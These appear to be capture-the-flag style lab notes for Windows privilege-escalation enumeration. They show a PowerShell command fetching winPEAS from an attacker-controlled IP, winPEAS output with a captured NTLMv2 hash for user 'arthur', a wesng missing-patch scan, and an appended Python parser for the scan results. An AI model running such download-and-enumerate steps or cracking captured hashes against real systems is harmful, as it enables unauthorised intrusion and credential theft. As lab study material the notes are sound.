PEAS


Running automated enumeration after the manual enumeration pass

PS C:\Users\arthur> iwr -Uri http://192.168.45.249/winPEASany.exe -OutFile .\winPEASany.exe
PS C:\Users\arthur> REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
The operation completed successfully.

Delivery complete

Executing PEAS

ENV


╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
    COMPUTERNAME: FISHYYY
    USERPROFILE: C:\Users\arthur
    HOMEPATH: \Users\arthur
    LOCALAPPDATA: C:\Users\arthur\AppData\Local
    PSModulePath: C:\Users\arthur\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Program Files\AdoptOpenJDK\jdk-8.0.292.10-hotspot\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Users\arthur\AppData\Local\Microsoft\WindowsApps;
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    LOGONSERVER: \\FISHYYY
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    HOMEDRIVE: C:
    SystemRoot: C:\WINDOWS
    SESSIONNAME: RDP-Tcp#21
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    APPDATA: C:\Users\arthur\AppData\Roaming
    PROCESSOR_REVISION: 1101
    USERNAME: arthur
    CommonProgramW6432: C:\Program Files\Common Files
    CommonProgramFiles: C:\Program Files\Common Files
    OneDrive: C:\Users\arthur\OneDrive
    CLIENTNAME: kali
    OS: Windows_NT
    USERDOMAIN_ROAMINGPROFILE: FISHYYY
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 17 Stepping 1, AuthenticAMD
    ComSpec: C:\WINDOWS\system32\cmd.exe
    SystemDrive: C:
    TEMP: C:\Users\arthur\AppData\Local\Temp
    ProgramFiles: C:\Program Files
    NUMBER_OF_PROCESSORS: 2
    TMP: C:\Users\arthur\AppData\Local\Temp
    ProgramData: C:\ProgramData
    ProgramW6432: C:\Program Files
    windir: C:\WINDOWS
    USERDOMAIN: FISHYYY
    PUBLIC: C:\Users\Public
 
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
    ComSpec: C:\WINDOWS\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Program Files\AdoptOpenJDK\jdk-8.0.292.10-hotspot\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\WINDOWS\TEMP
    TMP: C:\WINDOWS\TEMP
    USERNAME: SYSTEM
    windir: C:\WINDOWS
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 17 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 1101

N/A


AV


Total AV

UAC


PowerShell


C:\Users\arthur\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

.NET


Token Privileges (arthur)


Enumerated

Processes


TotalAV.exe

Services


Modifiable Services


NTLM


arthur::FISHYYY:1122334455667788:b141a44530bc234e100529215d76fd5a:01010000000000007df3b42168ced7012d95c6b0ad940f5e000000000800300030000000000000000000000000200000da0e65c3d498a42d004e19e47291bd72a3aab7f411207f992d9b1887f42ad6d70a00100000000000000000000000000000000000090000000000000000000000

Interesting Files / Directories


Write access

WESNG


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ wes --update ; wes sysinfo --exploits-only --hide "Internet Explorer" Edge Flash 
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250418
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - Name: Windows 10 Version 20H2 for x64-based Systems
    - Generation: 10
    - Build: 19042
    - Version: 20H2
    - Architecture: x64-based
    - Installed hotfixes (5): KB5009467, KB4562830, KB4580325, KB5006670, KB5005699
[+] Loading definitions
    - Creation date of definitions: 20250418
[+] Determining missing patches
[+] Applying display filters
[!] Found vulnerabilities!
 
Date: 20210413
CVE: CVE-2021-27094
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows ELAM
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
 
Date: 20210413
CVE: CVE-2021-27094
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows ELAM
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
 
Date: 20210413
CVE: CVE-2021-28447
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows Early Launch Antimalware Driver
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
 
Date: 20210413
CVE: CVE-2021-28447
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows Early Launch Antimalware Driver
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
 
[-] Missing patches: 1
    - KB5001330: patches 4 vulnerabilities
[I] KB with the most recent release date
    - ID: KB5001330
    - Release date: 20210413
[+] Done. Displaying 4 of the 209 vulnerabilities found.
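As an added example (not part of the original notes and not wesng's own code), a small Python parser for wes output in the shape shown above: it collapses the duplicated rows wes prints and reports the unique CVEs per missing KB, which is the list a patch owner actually needs. The sample text is constructed from the scan above, and the severity ordering used to pick the worst label is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample shaped like wes.py's finding blocks (values from the scan above; duplicate rows are how wes prints them).
SAMPLE_WES_OUTPUT = """\
[!] Found vulnerabilities!

Date: 20210413
CVE: CVE-2021-27094
KB: KB5001330
Severity: Important

Date: 20210413
CVE: CVE-2021-27094
KB: KB5001330
Severity: Important

Date: 20210413
CVE: CVE-2021-28447
KB: KB5001330
Severity: Important

[-] Missing patches: 1
"""

def parse_findings(text):
    """One dict per finding block, keyed by the 'Field:' names wes prints."""
    findings = []
    for block in re.split(r"\n\s*\n", text):          # blocks are blank-line separated
        fields = dict(re.findall(r"^(\w[\w ]*?): (.*)$", block, re.M))
        if "CVE" in fields and "KB" in fields:        # skips the [!] / [-] status lines
            findings.append(fields)
    return findings

def summarise(findings):
    """Collapse duplicate rows into unique CVEs per KB, keeping the worst severity seen."""
    # Ordering is an assumption based on Microsoft's severity labels, not wes's own logic.
    rank = {"Low": 0, "Moderate": 1, "Important": 2, "Critical": 3}
    per_kb = defaultdict(lambda: {"cves": set(), "severity": "Low"})
    for f in findings:
        entry = per_kb[f["KB"]]
        entry["cves"].add(f["CVE"])
        if rank.get(f.get("Severity"), 0) > rank[entry["severity"]]:
            entry["severity"] = f["Severity"]
    return {kb: (sorted(v["cves"]), v["severity"]) for kb, v in per_kb.items()}

if __name__ == "__main__":
    for kb, (cves, severity) in summarise(parse_findings(SAMPLE_WES_OUTPUT)).items():
        print(f"{kb}: {len(cves)} unique CVE(s), worst severity {severity}: {', '.join(cves)}")
```

Piping a real run through this (`wes sysinfo ... > wes.txt`) turns "Displaying 4 of the 209" into one KB with two CVEs, which is the number that belongs in a remediation ticket.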